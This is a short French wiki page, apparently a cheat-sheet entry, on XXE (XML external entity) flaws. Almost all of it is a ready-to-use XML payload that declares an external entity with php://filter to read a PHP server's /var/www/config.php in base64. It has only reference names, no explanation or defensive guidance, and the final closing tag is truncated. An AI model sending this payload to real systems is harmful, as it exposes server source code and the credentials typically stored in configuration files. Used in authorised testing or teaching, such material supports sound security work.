1.9 Failles XXE : Différence entre versions

De UnixWiki
Aller à : navigation, rechercher
 
(Aucune différence)

Version actuelle datée du 21 octobre 2014 à 18:32

Lire du code PHP avec une faille XXE

 <?xml version="1.0"?>
 <!DOCTYPE results [
   <!ENTITY harmless SYSTEM
   "php://filter/read=convert.base64-encode/resource=/var/www/config.php"
   >
 ]>
 <results>
   <result>&harmless;</result>
 </results

OWASP
h3stream
phpsecurity